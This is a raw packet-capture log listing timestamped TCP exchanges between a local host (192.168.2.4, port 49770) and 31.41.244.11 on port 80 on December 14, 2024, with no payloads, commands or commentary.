Dec 14, 2024 23:58:11.590787888 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.591653109 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.591703892 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.591780901 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.591828108 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.592701912 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.592756987 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.592823029 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.592869997 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.593753099 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.593805075 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.593878031 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.593924999 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.594803095 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.594856024 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.594929934 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.594978094 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.595877886 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.595928907 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.595983982 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.596031904 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.596929073 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.596981049 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.597112894 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.597168922 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.598117113 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.598153114 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.598169088 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.598205090 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.599042892 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.599095106 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.599163055 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.599210978 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.600128889 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.600181103 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.600224972 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.600270987 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.601147890 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.601198912 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.601268053 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.601310968 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.602211952 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.602262974 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.602334023 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.602384090 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.603260040 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.603327036 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.603368998 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.603419065 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.604285955 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.604338884 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.740319967 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.740416050 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.740427017 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.740495920 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.740777016 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.740842104 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.740971088 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.741022110 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.741780996 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.741836071 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.742192030 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.742245913 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.742324114 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.742374897 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.743232012 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.743283987 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.743366957 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.743426085 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.744294882 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.744348049 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.744434118 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.744492054 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.745361090 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.745510101 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.745564938 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.746396065 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.746447086 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.746567011 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.746615887 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.747446060 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.747495890 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.747581005 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.747627974 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.748498917 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.748548985 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.748738050 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.748788118 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.749739885 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.749809027 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.749857903 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.750648022 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.750698090 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.750845909 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.750895023 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.751720905 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.751770973 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.751903057 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.751950026 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.752743959 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.752794027 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.752899885 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.752948046 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.753824949 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.754112005 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.754168034 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.754857063 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.754913092 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.755018950 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.755070925 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.755906105 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.755961895 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.756134033 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.756176949 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.756957054 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.757021904 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.757105112 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.757155895 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.757996082 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.758160114 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.758215904 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.759041071 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.759090900 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.759179115 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.759227037 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.760104895 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.760159969 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.760276079 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.760324001 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.761255026 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.761303902 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.761363029 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.762236118 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.762286901 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.762367964 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.762414932 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.763264894 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.763319016 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.763442993 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.763493061 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.764312983 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.764364958 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.764478922 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.764530897 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.765383959 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.765566111 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.765619040 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.766423941 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.766473055 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.766599894 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.766649008 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.767497063 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.767545938 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.767621994 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.767671108 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.768551111 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.768610954 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.768697977 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.768747091 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.769615889 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.769865990 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.769923925 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.770658970 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.770709038 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.770787001 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.770836115 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.771743059 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.771791935 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.771948099 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.771995068 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.772768021 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.772833109 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.772906065 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.772948980 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.773813009 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.773978949 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.774039030 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.774877071 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.774940014 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.775016069 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.775068998 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.775962114 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.776021004 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.776098013 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.776144981 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.777007103 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.777054071 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.777134895 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.777178049 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.778048992 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.778204918 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.778253078 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.779087067 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.779133081 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.779211998 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.779254913 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.780132055 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.780179977 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.780286074 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.780330896 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.781215906 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.781260967 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.781342030 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.781385899 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.782314062 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.782361984 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.782443047 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.782486916 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.783307076 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.783377886 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.783459902 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.783513069 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.784353971 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.784430027 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.784512043 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.784585953 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.785424948 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.785566092 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.785624981 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.786529064 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.786601067 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.786633968 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.786680937 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.787574053 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.787636042 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.787683010 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.787729025 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.788602114 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.788669109 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.788741112 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.788788080 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.789630890 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.789793968 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.789861917 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.790703058 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.790759087 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.790860891 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.790909052 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.791801929 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.791853905 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.791935921 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.791982889 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.792881012 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.792941093 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.792958975 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.793001890 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.793837070 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.794012070 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.794073105 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.794929028 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.794987917 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.795034885 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.795084953 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.932451010 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.932511091 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.932517052 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.932553053 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.932710886 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.932847023 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.932981014 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.933777094 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.933862925 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.933909893 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.933948994 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.934842110 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.934890985 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.934942007 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.934984922 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.935887098 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.935950041 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.935980082 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.936094046 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.936924934 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.937055111 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.937098026 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.937988043 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.938132048 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.938178062 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.939028025 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.939068079 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.939153910 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.939202070 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.940124035 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.940176964 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.940222979 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.940593958 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.941139936 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.941211939 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.941261053 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.941391945 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.942186117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.942245960 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.942343950 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.942394018 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.943227053 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.943274975 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.943360090 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.944293976 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.944358110 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.944410086 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.944458961 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.945346117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.945477009 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.945528030 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.946382999 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.946429968 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.946511030 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.946554899 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.947463989 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.947637081 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.947690010 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.948514938 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.948569059 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.948641062 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.948685884 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.949558020 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.949611902 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.949676037 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.949723959 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.950643063 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.950704098 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.950819969 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.950911999 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.951759100 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.951809883 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.951898098 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.952122927 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.952739000 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.952795982 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.952918053 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.953037977 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.953771114 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.953893900 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.953953028 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.954826117 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.954880953 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.954946041 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.954988003 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:11.955883980 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:11.955931902 CET	49770	80	192.168.2.4	31.41.244.11
